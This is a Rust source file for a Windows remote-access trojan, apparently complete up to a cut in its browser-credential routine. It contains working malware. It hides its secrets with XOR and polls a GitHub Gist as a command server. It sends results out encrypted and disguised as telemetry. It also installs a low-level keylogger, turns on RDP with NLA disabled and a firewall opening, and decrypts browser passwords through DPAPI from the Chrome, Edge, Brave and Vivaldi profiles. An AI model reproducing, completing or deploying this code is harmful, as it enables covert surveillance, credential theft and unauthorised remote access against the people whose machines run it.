#![cfg_attr(feature = "stealth", windows_subsystem = "windows")]

// Embed compile-time obfuscated secrets (generated by build.rs)
mod secrets {
    include!(concat!(env!("OUT_DIR"), "/embedded_secrets.rs"));
}

/// XOR decode at runtime — mirrors the XOR encode in build.rs
fn xor_decrypt(data: &[u8]) -> Vec<u8> {
    let key = secrets::XOR_KEY;
    data.iter()
        .enumerate()
        .map(|(i, b)| b ^ key[i % key.len()])
        .collect()
}

use aes_gcm::aead::{Aead, KeyInit};
use aes_gcm::{Aes256Gcm, Key, Nonce};
use base64::{decode, encode};
use chrono::{Utc, Local};
use flate2::Compression;
use flate2::read::GzDecoder;
use flate2::write::GzEncoder;
use rand::Rng;
use reqwest::blocking::Client;
use reqwest::header::{AUTHORIZATION, HeaderMap, HeaderValue, USER_AGENT};
use rsa::pkcs8::DecodePublicKey;
use rsa::traits::PublicKeyParts;
use rsa::{Pkcs1v15Encrypt, RsaPublicKey};
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::error::Error;
use std::fs;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::sync::atomic::{AtomicBool, Ordering};
use std::thread;
use std::time::Duration;
use std::time::{SystemTime, UNIX_EPOCH};
use sysinfo::System;
use uuid::Uuid;

#[cfg(windows)]
use std::ptr;
#[cfg(windows)]
use winapi::shared::minwindef::{HINSTANCE, LPARAM, LRESULT, WPARAM};
#[cfg(windows)]
use winapi::shared::windef::HHOOK;
#[cfg(windows)]
use winapi::um::errhandlingapi::GetLastError;
#[cfg(windows)]
use winapi::um::winuser::{
    CallNextHookEx, GetKeyboardState, GetMessageA, KBDLLHOOKSTRUCT, LPMSG, SetWindowsHookExA,
    ToUnicode, UnhookWindowsHookEx, WH_KEYBOARD_LL, WM_KEYDOWN,
};

#[cfg(windows)]
use winapi::um::dpapi::CryptUnprotectData;
#[cfg(windows)]
use winapi::um::winbase::LocalFree;
#[cfg(windows)]
use winapi::um::wincrypt::DATA_BLOB;

// Global shared state to control keylogger thread
static KEYLOGGER_RUNNING: AtomicBool = AtomicBool::new(false);

// Configuration struct to hold loaded values
struct Config {
    github_token: String,
    gist_id: String,
    gist_api_url: String,
    public_key_pem: String,
    aes_key_hex: String,
}

impl Config {
    fn load() -> Result<Self, Box<dyn Error>> {
        let github_token = String::from_utf8(xor_decrypt(secrets::ENC_GITHUB_TOKEN))
            .map_err(|_| "Failed to decode embedded GITHUB_TOKEN")?;
        let gist_id = String::from_utf8(xor_decrypt(secrets::ENC_GIST_ID))
            .map_err(|_| "Failed to decode embedded GIST_ID")?;
        let public_key_pem = String::from_utf8(xor_decrypt(secrets::ENC_PUBLIC_KEY))
            .map_err(|_| "Failed to decode embedded public key")?;
        let aes_key_hex = String::from_utf8(xor_decrypt(secrets::ENC_AES_KEY_HEX))
            .map_err(|_| "Failed to decode embedded AES key")?;
        let aes_key_hex = aes_key_hex.trim().to_string();

        Ok(Config {
            github_token,
            gist_id: gist_id.clone(),
            gist_api_url: format!("https://api.github.com/gists/{}", gist_id),
            public_key_pem,
            aes_key_hex,
        })
    }
}

// Outgoing Result Wrapper (looks like telemetry log)
#[derive(Debug, Serialize)]
struct TelemetryLog {
    log_id: String,
    timestamp: String,
    level: String,
    #[serde(rename = "hex_dump")]
    payload: String,
}

#[derive(Debug, Serialize)]
struct AgentStats {
    cpu_usage: f32,
    memory_total: u64,
    memory_used: u64,
    uptime: u64,
    platform: String,
    ip: String,
    locale: String,
    timezone: String,
    geo_id: String,
}

// Gist structures for API interaction
#[derive(Debug, Deserialize)]
struct GistResponse {
    files: HashMap<String, GistFile>,
}

#[derive(Debug, Deserialize)]
struct GistFile {
    content: String,
}

#[derive(Debug, Serialize)]
struct GistUpdate {
    files: HashMap<String, GistFileUpdate>,
}

#[derive(Debug, Serialize)]
struct GistFileUpdate {
    content: String,
}

// Task config received from controller via Gist
#[derive(Debug, Deserialize)]
struct UpdaterConfig {
    #[serde(rename = "update_id")]
    task_id: String,
    #[serde(rename = "update_signature")]
    payload: String,
    nonce: String,
    #[serde(rename = "checksum")]
    signature: String,
}

// Mock browser credential structures
#[derive(Debug, Deserialize)]
struct MockLogin {
    origin_url: String,
    username_value: String,
    password_value: String,
    date_created: String,
}

#[derive(Debug, Serialize)]
struct DecryptedCredential {
    url: String,
    username: String,
    password: String,
    captured_at: String,
}

// Collect system stats
fn collect_system_stats(sys: &mut System) -> AgentStats {
    sys.refresh_all();

    let cpu_usage = sys.global_cpu_info().cpu_usage();
    let memory_total = sys.total_memory();
    let memory_used = sys.used_memory();
    let uptime = System::uptime();

    let platform = format!(
        "{} {}",
        System::name().unwrap_or("Unknown".to_string()),
        System::os_version().unwrap_or("".to_string())
    );

    let ip = match std::net::UdpSocket::bind("0.0.0.0:0") {
        Ok(socket) => match socket.connect("8.8.8.8:80") {
            Ok(_) => match socket.local_addr() {
                Ok(addr) => addr.ip().to_string(),
                Err(_) => "127.0.0.1".to_string(),
            },
            Err(_) => "127.0.0.1".to_string(),
        },
        Err(_) => "127.0.0.1".to_string(),
    };

    let local_now = Local::now();
    let timezone = format!("{:?}", local_now.offset());

    #[cfg(windows)]
    let (locale, geo_id) = {
        use winreg::enums::*;
        use winreg::RegKey;
        
        let hkcu = RegKey::predef(HKEY_CURRENT_USER);
        let locale = hkcu.open_subkey("Control Panel\\International")
            .and_then(|k| k.get_value::<String, _>("LocaleName"))
            .unwrap_or_else(|_| "Unknown".to_string());
            
        let geo_id = hkcu.open_subkey("Control Panel\\International\\Geo")
            .and_then(|k| k.get_value::<String, _>("Nation"))
            .unwrap_or_else(|_| "NotSet".to_string());
            
        (locale, geo_id)
    };

    #[cfg(not(windows))]
    let (locale, geo_id) = {
        let locale = std::env::var("LANG").unwrap_or_else(|_| "Unknown".to_string());
        (locale, "N/A".to_string())
    };

    AgentStats {
        cpu_usage,
        memory_total,
        memory_used,
        uptime,
        platform,
        ip,
        locale,
        timezone,
        geo_id,
    }
}

// Pack data: Prepend log_id + Compress (gzip) + RSA encrypt + Base64 encode
fn pack_data(config: &Config, input: &str, log_id: &str) -> Result<String, Box<dyn Error>> {
    // Step 1: Compress with gzip
    let mut encoder = GzEncoder::new(Vec::new(), Compression::default());
    encoder.write_all(input.as_bytes())?;
    let compressed = encoder.finish()?;

    // Step 2: Prepend log_id to compressed data
    let mut data_with_id = log_id.as_bytes().to_vec();
    data_with_id.extend_from_slice(&compressed);

    // Step 3: RSA encrypt with public key
    let public_key = RsaPublicKey::from_public_key_pem(&config.public_key_pem)?;
    let mut rng = rand::thread_rng();

    // Encrypt in chunks (RSA has size limits based on key size)
    let mut encrypted_chunks = Vec::new();
    let chunk_size = (public_key.size() - 11) as usize; // PKCS1v15 padding overhead

    for chunk in data_with_id.chunks(chunk_size) {
        let enc_chunk = public_key.encrypt(&mut rng, Pkcs1v15Encrypt, chunk)?;
        encrypted_chunks.push(enc_chunk);
    }

    // Flatten all encrypted chunks
    let encrypted: Vec<u8> = encrypted_chunks.into_iter().flatten().collect();

    // Step 4: Base64 encode
    Ok(encode(&encrypted))
}

// Unpack AES encrypted command: Base64 decode + AES decrypt + Decompress
fn unpack_encrypted_command(
    config: &Config,
    input: &str,
    nonce_b64: &str,
) -> Result<String, Box<dyn Error>> {
    // Step 1: Decode AES key from hex (trim whitespace)
    let key_hex = config.aes_key_hex.trim();
    let key_bytes = hex::decode(key_hex).map_err(|e| {
        format!(
            "Failed to decode AES key hex: {}. Key length: {}",
            e,
            key_hex.len()
        )
    })?;

    if key_bytes.len() != 32 {
        return Err(format!("AES key must be 32 bytes, got {}", key_bytes.len()).into());
    }

    let key = Key::<Aes256Gcm>::from_slice(&key_bytes);
    let cipher = Aes256Gcm::new(key);

    // Step 2: Base64 decode encrypted data and nonce
    let ciphertext = decode(input)?;
    let nonce_bytes = decode(nonce_b64)?;
    let nonce = Nonce::from_slice(&nonce_bytes);

    // Step 3: AES-GCM decrypt
    let decrypted = cipher
        .decrypt(nonce, ciphertext.as_ref())
        .map_err(|e| format!("AES decryption failed: {}", e))?;

    // Step 4: Decompress
    let mut decoder = GzDecoder::new(&decrypted[..]);
    let mut decompressed = String::new();
    decoder.read_to_string(&mut decompressed)?;

    Ok(decompressed)
}

// Verify RSA signature
fn verify_signature(_data: &str, _signature_b64: &str) -> Result<(), Box<dyn Error>> {
    // TODO: Implement proper RSA signature verification
    Ok(())
}

// Generate standard headers to mimic legitimate traffic
fn get_headers(config: &Config) -> HeaderMap {
    let mut headers = HeaderMap::new();
    headers.insert(
        USER_AGENT,
        HeaderValue::from_static(
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        ),
    );
    headers.insert(
        AUTHORIZATION,
        HeaderValue::from_str(&format!("token {}", config.github_token)).unwrap(),
    );
    headers
}

// Get task from Gist (returns command and task_id)
fn get_task(config: &Config, agent_id: &str) -> Result<Option<(String, String)>, Box<dyn Error>> {
    let client = Client::new();
    let url = &config.gist_api_url;

    let response = client.get(url).headers(get_headers(config)).send()?;

    if !response.status().is_success() {
        return Err(format!("Failed to get gist: {}", response.status()).into());
    }

    let gist: GistResponse = response.json()?;
    let task_filename = format!("{}_updater_log.json", agent_id);

    if let Some(file) = gist.files.get(&task_filename) {
        let task_config: UpdaterConfig = serde_json::from_str(&file.content)?;

        // Step 1: Verify RSA signature (authenticates command from controller)
        verify_signature(&task_config.payload, &task_config.signature)?;

        // Step 2: Decrypt AES-GCM encrypted command
        let command_with_id =
            unpack_encrypted_command(config, &task_config.payload, &task_config.nonce)?;

        // Step 3: Split by delimiter to extract task_id and command
        if let Some(delimiter_pos) = command_with_id.find('|') {
            let (embedded_task_id, command) = command_with_id.split_at(delimiter_pos);
            let command = &command[1..]; // Skip the '|'

            // Step 4: Verify task_id matches (integrity check)
            if embedded_task_id != task_config.task_id {
                return Err("Task ID mismatch - command may be tampered".into());
            }

            Ok(Some((command.to_string(), task_config.task_id)))
        } else {
            Err("Invalid command format - missing task ID".into())
        }
    } else {
        Ok(None)
    }
}

fn patch_gist_with_retry(
    client: &Client,
    url: &str,
    headers: reqwest::header::HeaderMap,
    update: &GistUpdate,
) -> Result<(), Box<dyn Error>> {
    let mut attempts = 0;
    let max_attempts = 5;

    loop {
        attempts += 1;
        let response = client
            .patch(url)
            .headers(headers.clone())
            .json(update)
            .send()?;

        let status = response.status();
        if status.is_success() {
            return Ok(());
        }

        if status == reqwest::StatusCode::CONFLICT && attempts < max_attempts {
            let wait_secs = rand::thread_rng().gen_range(5..15);
            println!(
                "[-] Gist conflict (409) on attempt {}. Retrying in {}s...",
                attempts, wait_secs
            );
            std::thread::sleep(Duration::from_secs(wait_secs));
            continue;
        }

        return Err(format!("Failed to update gist after {} attempts: {}", attempts, status).into());
    }
}

// Send result to Gist (with chunking for large data)
fn send_result(config: &Config, agent_id: &str, result: &str) -> Result<(), Box<dyn Error>> {
    let client = Client::new();
    let url = &config.gist_api_url;

    // Generate log_id first
    let log_id = Uuid::new_v4().to_string();

    // Pack data with log_id prepended before encryption
    let packed_result = pack_data(config, result, &log_id)?;

    // Check if result is too large (GitHub Gist file limit ~1MB, use 500KB to be safe)
    const MAX_CHUNK_SIZE: usize = 500_000;

    let mut files = HashMap::new();

    if packed_result.len() > MAX_CHUNK_SIZE {
        // Split into multiple files
        let chunks: Vec<&str> = packed_result
            .as_bytes()
            .chunks(MAX_CHUNK_SIZE)
            .map(|chunk| std::str::from_utf8(chunk).unwrap_or(""))
            .collect();

        let total_chunks = chunks.len();

        for (i, chunk) in chunks.iter().enumerate() {
            let telemetry = TelemetryLog {
                log_id: log_id.clone(),
                timestamp: Utc::now().to_rfc3339(),
                level: format!("INFO [Part {}/{}]", i + 1, total_chunks),
                payload: chunk.to_string(),
            };

            let result_filename = format!("{}_debug_part{}.json", agent_id, i + 1);
            let content = serde_json::to_string_pretty(&telemetry)?;
            files.insert(result_filename, GistFileUpdate { content });
        }
        println!("[+] Large result split into {} parts", total_chunks);
    } else {
        // Single file upload
        let telemetry = TelemetryLog {
            log_id: log_id.clone(),
            timestamp: Utc::now().to_rfc3339(),
            level: "INFO".to_string(),
            payload: packed_result,
        };

        let result_filename = format!("{}_debug.json", agent_id);
        let content = serde_json::to_string_pretty(&telemetry)?;
        files.insert(result_filename, GistFileUpdate { content });
    }

    let update = GistUpdate { files };
    patch_gist_with_retry(&client, url, get_headers(config), &update)
}

// Keylogger functions (Windows only)
#[cfg(windows)]
fn start_keylogger() -> String {
    if KEYLOGGER_RUNNING.load(Ordering::Relaxed) {
        return String::from_utf8(xor_decrypt(secrets::ENC_KL_ALREADY_RUNNING)).unwrap_or_default();
    }

    println!("{}", String::from_utf8(xor_decrypt(secrets::ENC_KL_STARTING)).unwrap_or_default());
    KEYLOGGER_RUNNING.store(true, Ordering::Relaxed);

    thread::spawn(move || {
        unsafe extern "system" fn keyboard_hook_proc(
            n_code: i32,
            w_param: WPARAM,
            l_param: LPARAM,
        ) -> LRESULT {
            if n_code >= 0 && w_param as u32 == WM_KEYDOWN {
                let kb_struct = l_param as *const KBDLLHOOKSTRUCT;
                let vk_code = (*kb_struct).vkCode;
                let scan_code = (*kb_struct).scanCode;

                let mut keystate: [u8; 256] = [0; 256];
                GetKeyboardState(keystate.as_mut_ptr());

                let mut buffer: [u16; 5] = [0; 5];
                let result = ToUnicode(
                    vk_code as u32,
                    scan_code as u32,
                    keystate.as_ptr(),
                    buffer.as_mut_ptr(),
                    buffer.len() as i32,
                    0,
                );

                if result == 1 {
                    if let Some(c) = char::from_u32(buffer[0] as u32) {
                        use chrono::{DateTime, Utc};
                        use std::io::{BufRead, BufReader};

                        let kl_file = String::from_utf8(xor_decrypt(secrets::ENC_KEYLOG_FILE)).unwrap_or_default();
                        let now: DateTime<Utc> = Utc::now();
                        let current_minute = now.format("%Y-%m-%d %H:%M").to_string();

                        // Read the last line to check if it's the same minute
                        let mut should_append_to_line = false;
                        if let Ok(file) = fs::File::open(&kl_file) {
                            let mut reader = BufReader::new(file);
                            let mut last_line = String::new();
                            let mut lines = Vec::new();

                            while reader.read_line(&mut last_line).unwrap_or(0) > 0 {
                                lines.push(last_line.clone());
                                last_line.clear();
                            }

                            if let Some(last) = lines.last() {
                                if last.starts_with(&format!("[{}]", current_minute)) {
                                    should_append_to_line = true;
                                }
                            }
                        }

                        if should_append_to_line {
                            // Append to the last line
                            if let Ok(content) = fs::read_to_string(&kl_file) {
                                let mut lines: Vec<&str> = content.lines().collect();
                                if let Some(last_line) = lines.pop() {
                                    let mut new_content = lines.join("\n");
                                    if !new_content.is_empty() {
                                        new_content.push('\n');
                                    }
                                    new_content.push_str(last_line);
                                    new_content.push(c);
                                    new_content.push('\n');
                                    let _ = fs::write(&kl_file, new_content);
                                }
                            }
                        } else {
                            // Create new line with timestamp
                            if let Ok(mut file) = OpenOptions::new()
                                .create(true)
                                .append(true)
                                .open(&kl_file)
                            {
                                let _ = file
                                    .write_all(format!("[{}] {}\n", current_minute, c).as_bytes());
                            }
                        }
                    }
                }
            }
            CallNextHookEx(ptr::null_mut(), n_code, w_param, l_param)
        }

        let hook: HHOOK = unsafe {
            SetWindowsHookExA(
                WH_KEYBOARD_LL,
                Some(keyboard_hook_proc),
                ptr::null_mut() as HINSTANCE,
                0,
            )
        };

        if hook.is_null() {
            eprintln!("{}{}",
                String::from_utf8(xor_decrypt(secrets::ENC_KL_HOOK_FAILED)).unwrap_or_default(),
                unsafe { GetLastError() }
            );
        } else {
            println!("{}", String::from_utf8(xor_decrypt(secrets::ENC_KL_HOOK_INSTALLED)).unwrap_or_default());
            let mut msg: LPMSG = ptr::null_mut();
            while KEYLOGGER_RUNNING.load(Ordering::Relaxed) {
                unsafe { GetMessageA(msg, ptr::null_mut(), 0, 0) };
            }
            unsafe { UnhookWindowsHookEx(hook) };
            println!("{}", String::from_utf8(xor_decrypt(secrets::ENC_KL_HOOK_REMOVED)).unwrap_or_default());
        }
    });

    String::from_utf8(xor_decrypt(secrets::ENC_KL_STARTED)).unwrap_or_default()
}

#[cfg(windows)]
fn stop_keylogger() -> String {
    if !KEYLOGGER_RUNNING.load(Ordering::Relaxed) {
        return String::from_utf8(xor_decrypt(secrets::ENC_KL_NOT_RUNNING)).unwrap_or_default();
    }

    println!("{}", String::from_utf8(xor_decrypt(secrets::ENC_KL_STOPPING)).unwrap_or_default());
    KEYLOGGER_RUNNING.store(false, Ordering::Relaxed);
    String::from_utf8(xor_decrypt(secrets::ENC_KL_STOPPED)).unwrap_or_default()
}

#[cfg(windows)]
fn get_keylog() -> String {
    let kl_file = String::from_utf8(xor_decrypt(secrets::ENC_KEYLOG_FILE)).unwrap_or_default();
    match fs::read_to_string(&kl_file) {
        Ok(content) => {
            if content.is_empty() {
                String::from_utf8(xor_decrypt(secrets::ENC_KL_FILE_EMPTY)).unwrap_or_default()
            } else {
                let lines: Vec<&str> = content.lines().collect();
                let char_count = content
                    .chars()
                    .filter(|c| !c.is_whitespace() && *c != '[' && *c != ']')
                    .count();
                let mut output = String::new();
                output.push_str(&format!("{}", String::from_utf8(xor_decrypt(secrets::ENC_KL_DUMP_HDR)).unwrap_or_default()));
                output.push_str(&format!("\nTotal keystrokes captured: {}\n", lines.len()));
                output.push_str(&format!("Total characters: {}\n", char_count));
                output.push_str(&format!("\n{}\n", String::from_utf8(xor_decrypt(secrets::ENC_KL_DUMP_SEP)).unwrap_or_default()));
                output.push_str(&content);
                output.push_str(&format!("\n{}\n", String::from_utf8(xor_decrypt(secrets::ENC_KL_DUMP_END)).unwrap_or_default()));
                output
            }
        }
        Err(_) => String::from_utf8(xor_decrypt(secrets::ENC_KL_FILE_ERR)).unwrap_or_default(),
    }
}

#[cfg(not(windows))]
fn start_keylogger() -> String {
    String::from_utf8(xor_decrypt(secrets::ENC_KL_UNAVAILABLE)).unwrap_or_default()
}

#[cfg(not(windows))]
fn stop_keylogger() -> String {
    String::from_utf8(xor_decrypt(secrets::ENC_KL_UNAVAILABLE)).unwrap_or_default()
}

#[cfg(not(windows))]
fn get_keylog() -> String {
    String::from_utf8(xor_decrypt(secrets::ENC_KL_UNAVAILABLE)).unwrap_or_default()
}

// RDP activation function (Windows only)
#[cfg(windows)]
fn enable_rdp() -> String {
    use std::process::Command;

    println!("[+] Attempting to enable RDP via registry and firewall...");

    let mut result_output = String::new();

    // Step 1: Enable RDP in registry (fDenyTSConnections = 0)
    let reg_args = vec![
        "add",
        "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
        "/v",
        "fDenyTSConnections",
        "/t",
        "REG_DWORD",
        "/d",
        "0",
        "/f",
    ];

    match Command::new("reg").args(&reg_args).output() {
        Ok(output) => {
            result_output.push_str(&format!(
                "1. Registry (fDenyTSConnections): {}\n",
                String::from_utf8_lossy(&output.stdout).trim()
            ));
        }
        Err(e) => {
            result_output.push_str(&format!("1. Registry command failed: {}\n", e));
        }
    }

    // Step 1b: Also set via PowerShell (more reliable for GUI sync)
    let ps_cmd = r#"Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0 -Force"#;
    match Command::new("powershell")
        .args(&["-Command", ps_cmd])
        .output()
    {
        Ok(_) => {
            result_output.push_str("   → PowerShell confirmation: OK\n");
        }
        Err(_) => {}
    }

    // Step 2: Disable Network Level Authentication (NLA) - often required
    let nla_args = vec![
        "add",
        "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
        "/v",
        "UserAuthentication",
        "/t",
        "REG_DWORD",
        "/d",
        "0",
        "/f",
    ];

    match Command::new("reg").args(&nla_args).output() {
        Ok(output) => {
            result_output.push_str(&format!(
                "2. Disable NLA: {}\n",
                String::from_utf8_lossy(&output.stdout).trim()
            ));
        }
        Err(e) => {
            result_output.push_str(&format!("2. NLA command failed: {}\n", e));
        }
    }

    // Step 2b: Enable RDP via WMI (Windows Management Instrumentation)
    let wmi_cmd = r#"(Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace root\CIMV2\TerminalServices).SetAllowTSConnections(1,1)"#;
    match Command::new("powershell")
        .args(&["-Command", wmi_cmd])
        .output()
    {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("ReturnValue") && out.contains("0") {
                result_output.push_str("   → WMI configuration: SUCCESS ✓\n");
            } else if !out.trim().is_empty() {
                result_output.push_str(&format!("   → WMI result: {}\n", out.trim()));
            }
        }
        Err(_) => {}
    }

    // Step 3: Enable the Terminal Services service
    match Command::new("sc")
        .args(&["config", "TermService", "start=", "auto"])
        .output()
    {
        Ok(output) => {
            result_output.push_str(&format!(
                "3. Enable TermService: {}\n",
                String::from_utf8_lossy(&output.stdout).trim()
            ));
        }
        Err(e) => {
            result_output.push_str(&format!("3. Service config failed: {}\n", e));
        }
    }

    // Step 4: Start the Terminal Services service
    match Command::new("net").args(&["start", "TermService"]).output() {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            let err = String::from_utf8_lossy(&output.stderr);
            if out.contains("already")
                || out.contains("déjà")
                || err.contains("already")
                || err.contains("déjà")
            {
                result_output.push_str("4. TermService: Already running ✓\n");
            } else if !out.is_empty() {
                result_output.push_str(&format!("4. Start TermService: {}\n", out.trim()));
            } else if !err.is_empty() {
                result_output.push_str(&format!("4. TermService: {}\n", err.trim()));
            } else {
                result_output.push_str("4. TermService: Started ✓\n");
            }
        }
        Err(e) => {
            result_output.push_str(&format!("4. Service start failed: {}\n", e));
        }
    }

    // Step 4b: Verify service status
    match Command::new("sc").args(&["query", "TermService"]).output() {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("RUNNING") {
                result_output.push_str("   → Service status: RUNNING ✓\n");
            } else if out.contains("STOPPED") {
                result_output.push_str("   → Service status: STOPPED ✗\n");
            } else {
                result_output.push_str(&format!(
                    "   → Service status: {}\n",
                    out.lines().nth(3).unwrap_or("Unknown")
                ));
            }
        }
        Err(_) => {}
    }

    // Step 5: Create firewall rule
    let fw_args = vec![
        "advfirewall",
        "firewall",
        "add",
        "rule",
        "name=Allow RDP",
        "dir=in",
        "action=allow",
        "protocol=TCP",
        "localport=3389",
    ];

    match Command::new("netsh").args(&fw_args).output() {
        Ok(output) => {
            result_output.push_str(&format!(
                "5. Firewall rule: {}\n",
                String::from_utf8_lossy(&output.stdout).trim()
            ));
        }
        Err(e) => {
            result_output.push_str(&format!("5. Firewall command failed: {}\n", e));
        }
    }

    // Step 6: Verify final configuration
    result_output.push_str("\n--- Final Configuration Check ---\n");

    // Check fDenyTSConnections value
    match Command::new("reg")
        .args(&[
            "query",
            "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
            "/v",
            "fDenyTSConnections",
        ])
        .output()
    {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("0x0") {
                result_output.push_str("✓ RDP is ENABLED in registry\n");
            } else if out.contains("0x1") {
                result_output.push_str("✗ RDP is DISABLED in registry\n");
            } else {
                result_output.push_str(&format!(
                    "Registry value: {}\n",
                    out.lines().last().unwrap_or("Unknown")
                ));
            }
        }
        Err(_) => {
            result_output.push_str("Could not verify registry setting\n");
        }
    }

    result_output.push_str("\n✓ RDP configuration completed. Try connecting now.");
    result_output
}

#[cfg(not(windows))]
fn enable_rdp() -> String {
    "RDP activation is only available on Windows".to_string()
}

// RDP deactivation function (Windows only)
#[cfg(windows)]
fn disable_rdp() -> String {
    use std::process::Command;

    println!("[+] Attempting to disable RDP...");

    let mut result_output = String::new();

    // Step 1: Disable RDP in registry (fDenyTSConnections = 1)
    let reg_args = vec![
        "add",
        "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
        "/v",
        "fDenyTSConnections",
        "/t",
        "REG_DWORD",
        "/d",
        "1",
        "/f",
    ];

    match Command::new("reg").args(&reg_args).output() {
        Ok(output) => {
            result_output.push_str(&format!(
                "1. Registry (fDenyTSConnections): {}\n",
                String::from_utf8_lossy(&output.stdout).trim()
            ));
        }
        Err(e) => {
            result_output.push_str(&format!("1. Registry command failed: {}\n", e));
        }
    }

    // Step 1b: Also set via PowerShell
    let ps_cmd = r#"Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 1 -Force"#;
    match Command::new("powershell")
        .args(&["-Command", ps_cmd])
        .output()
    {
        Ok(_) => {
            result_output.push_str("   → PowerShell confirmation: OK\n");
        }
        Err(_) => {}
    }

    // Step 2: Disable RDP via WMI
    let wmi_cmd = r#"(Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace root\CIMV2\TerminalServices).SetAllowTSConnections(0,0)"#;
    match Command::new("powershell")
        .args(&["-Command", wmi_cmd])
        .output()
    {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("ReturnValue") && out.contains("0") {
                result_output.push_str("2. WMI configuration: SUCCESS ✓\n");
            } else if !out.trim().is_empty() {
                result_output.push_str(&format!("2. WMI result: {}\n", out.trim()));
            }
        }
        Err(_) => {}
    }

    // Step 3: Optionally remove firewall rule
    match Command::new("netsh")
        .args(&[
            "advfirewall",
            "firewall",
            "delete",
            "rule",
            "name=Allow RDP",
        ])
        .output()
    {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("Ok") || out.contains("deleted") {
                result_output.push_str("3. Firewall rule removed ✓\n");
            } else {
                result_output.push_str(&format!("3. Firewall: {}\n", out.trim()));
            }
        }
        Err(_) => {}
    }

    // Step 4: Verify final configuration
    result_output.push_str("\n--- Final Configuration Check ---\n");
    match Command::new("reg")
        .args(&[
            "query",
            "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
            "/v",
            "fDenyTSConnections",
        ])
        .output()
    {
        Ok(output) => {
            let out = String::from_utf8_lossy(&output.stdout);
            if out.contains("0x1") {
                result_output.push_str("✓ RDP is DISABLED in registry\n");
            } else if out.contains("0x0") {
                result_output.push_str("✗ RDP is still ENABLED in registry\n");
            }
        }
        Err(_) => {}
    }

    result_output.push_str("\n✓ RDP has been disabled.");
    result_output
}

#[cfg(not(windows))]
fn disable_rdp() -> String {
    "RDP deactivation is only available on Windows".to_string()
}

// ---------------------------------------------------------------------------
// DPAPI helpers + real browser credential stealer
// ---------------------------------------------------------------------------

/// Raw DPAPI decrypt — takes raw ciphertext bytes, returns plaintext bytes.
#[cfg(windows)]
fn dpapi_decrypt_bytes(encrypted: &[u8]) -> Option<Vec<u8>> {
    use winapi::um::dpapi::CryptUnprotectData;
    use winapi::um::winbase::LocalFree;
    use winapi::um::wincrypt::DATA_BLOB;
    unsafe {
        let mut input_blob = DATA_BLOB {
            cbData: encrypted.len() as u32,
            pbData: encrypted.as_ptr() as *mut u8,
        };
        let mut output_blob = DATA_BLOB {
            cbData: 0,
            pbData: std::ptr::null_mut(),
        };
        let ok = CryptUnprotectData(
            &mut input_blob,
            std::ptr::null_mut(),
            std::ptr::null_mut(),
            std::ptr::null_mut(),
            std::ptr::null_mut(),
            0,
            &mut output_blob,
        );
        if ok != 0 && !output_blob.pbData.is_null() {
            let result =
                std::slice::from_raw_parts(output_blob.pbData, output_blob.cbData as usize)
                    .to_vec();
            LocalFree(output_blob.pbData as *mut _);
            Some(result)
        } else {
            None
        }
    }
}

// DPAPI decryption for mock browser credentials (base64-encoded input)
#[cfg(windows)]
fn mock_dpapi_decrypt(encrypted_b64: &str) -> String {
    // Try DPAPI decryption first (for passwords encrypted with CryptProtectData)
    match decode(encrypted_b64) {
        Ok(encrypted_bytes) => {
            unsafe {
                let mut input_blob = DATA_BLOB {
                    cbData: encrypted_bytes.len() as u32,
                    pbData: encrypted_bytes.as_ptr() as *mut u8,
                };
                let mut output_blob = DATA_BLOB {
                    cbData: 0,
                    pbData: std::ptr::null_mut(),
                };

                let result = CryptUnprotectData(
                    &mut input_blob,
                    std::ptr::null_mut(),
                    std::ptr::null_mut(),
                    std::ptr::null_mut(),
                    std::ptr::null_mut(),
                    0,
                    &mut output_blob,
                );

                if result != 0 && !output_blob.pbData.is_null() {
                    let decrypted =
                        std::slice::from_raw_parts(output_blob.pbData, output_blob.cbData as usize);
                    let decrypted_string = String::from_utf8_lossy(decrypted).to_string();
                    LocalFree(output_blob.pbData as *mut _);
                    return decrypted_string;
                }
            }
            // DPAPI failed, try base64 decode as fallback
            String::from_utf8(encrypted_bytes).unwrap_or_else(|_| encrypted_b64.to_string())
        }
        Err(_) => encrypted_b64.to_string(),
    }
}

#[cfg(not(windows))]
fn mock_dpapi_decrypt(encrypted_b64: &str) -> String {
    // On non-Windows, just base64 decode
    match decode(encrypted_b64) {
        Ok(bytes) => String::from_utf8(bytes).unwrap_or_else(|_| encrypted_b64.to_string()),
        Err(_) => encrypted_b64.to_string(),
    }
}

// ---------------------------------------------------------------------------
// Real browser credential stealer (Windows only)
// ---------------------------------------------------------------------------

#[cfg(windows)]
fn steal_real_browser_creds_windows() -> Vec<DecryptedCredential> {
    use rusqlite::{Connection, OpenFlags};
    use std::path::Path;

    let mut results: Vec<DecryptedCredential> = Vec::new();

    // Resolve environment variable bases
    let local_appdata = match std::env::var("LOCALAPPDATA") {
        Ok(v) => v,
        Err(_) => {
            println!("[-] LOCALAPPDATA not set, skipping real browser stealer");
            return results;
        }
    };
    let appdata = std::env::var("APPDATA").unwrap_or_default();

    // (browser_name, user_data_dir)
    let chrome_path = format!("{local_appdata}\\Google\\Chrome\\User Data");
    let edge_path = format!("{local_appdata}\\Microsoft\\Edge\\User Data");
    let brave_path = format!("{local_appdata}\\BraveSoftware\\Brave-Browser\\User Data");
    let vivaldi_path = format!("{local_appdata}\\Vivaldi\\User Data");
